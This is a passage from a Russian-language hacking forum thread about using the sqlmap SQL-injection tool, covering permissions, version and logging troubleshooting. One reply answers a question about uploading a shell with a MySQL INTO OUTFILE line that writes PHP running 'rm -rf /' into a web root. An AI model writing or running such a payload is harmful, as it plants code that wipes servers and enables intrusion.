Старый 06.02.2012, 10:36   #31
vityab77
 
Регистрация: 05.02.2012
Сообщений: 0
Репутация: 0
По умолчанию

Сайт мой, папку создал сам, права на запись есть
vityab77 вне форума   Ответить с цитированием
Старый 06.02.2012, 12:09   #32
snake
 
Регистрация: 05.07.2010
Сообщений: 173
Репутация: 12
По умолчанию

покажи
ls -la /home/webmaster/www/site.ru/htdocs/tmp
snake вне форума   Ответить с цитированием
Старый 06.02.2012, 15:57   #33
vityab77
 
Регистрация: 05.02.2012
Сообщений: 0
Репутация: 0
По умолчанию

Цитата:
Сообщение от snake Посмотреть сообщение
покажи
ls -la /home/webmaster/www/site.ru/htdocs/tmp
total 8
drwxrwxrwx 2 webmaster webmaster 4096 2012-02-05 18:14 .
drwxr-xr-x 35 webmaster webmaster 4096 2012-02-05 21:36 ..
vityab77 вне форума   Ответить с цитированием
Старый 06.02.2012, 17:01   #34
tipsy
 
Аватар для tipsy
 
Регистрация: 10.07.2010
Сообщений: 415
Репутация: 311
По умолчанию

Цитата:
Сообщение от vityab77 Посмотреть сообщение
[23:28:14] [DEBUG] got HTTP error code: 404 (Not Found)
Скорее всего баг в sqlmap, из-за которого запрос формируется неверно.
Если есть желание разбираться, смотри логи апача, смотри сниффером, чего там отправляет sqlmap или подредактируй её, чтобы дублировала запросы на экран.
tipsy вне форума   Ответить с цитированием
Старый 06.02.2012, 17:48   #35
Shadowfolder
Banned
 
Регистрация: 25.01.2012
Сообщений: 26
Репутация: -8
По умолчанию

vityab77 посмотри, может у тебя старая версия sqlmap, поставь 1.0
Shadowfolder вне форума   Ответить с цитированием
Старый 06.02.2012, 19:54   #36
vityab77
 
Регистрация: 05.02.2012
Сообщений: 0
Репутация: 0
По умолчанию

у меня 0.9 версия
vityab77 вне форума   Ответить с цитированием
Старый 07.02.2012, 18:07   #37
dumb
 
Регистрация: 01.10.2011
Сообщений: 63
Репутация: 1
По умолчанию

По поводу вывода юзайте:
--parse-errors
-t full-IO-log.txt
Цитата:
Сообщение от vityab77 Посмотреть сообщение
у меня 0.9 версия
1.0-dev уже с полгода ребилдами вверх ползет!
dumb вне форума   Ответить с цитированием
Старый 27.02.2012, 04:14   #38
Shadowfolder
Banned
 
Регистрация: 25.01.2012
Сообщений: 26
Репутация: -8
По умолчанию

А как через sql-query залить шелл?
Shadowfolder вне форума   Ответить с цитированием
Старый 27.02.2012, 11:55   #39
snake
 
Регистрация: 05.07.2010
Сообщений: 173
Репутация: 12
По умолчанию

select 'passthru("rm -rf /");' into outfile '/var/www/html/root.php'

так же как и без склмапа.
snake вне форума   Ответить с цитированием
Старый 27.02.2012, 19:02   #40
Shadowfolder
Banned
 
Регистрация: 25.01.2012
Сообщений: 26
Репутация: -8
По умолчанию

Цитата:
Сообщение от snake Посмотреть сообщение
select 'passthru("rm -rf /");' into outfile '/var/www/html/root.php'

так же как и без склмапа.
и как можно будет туда записать шелл? что такое "rm -rf /?
Shadowfolder вне форума   Ответить с цитированием
Ответ

Метки
sqlmap для новичков, sqlmap shell

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot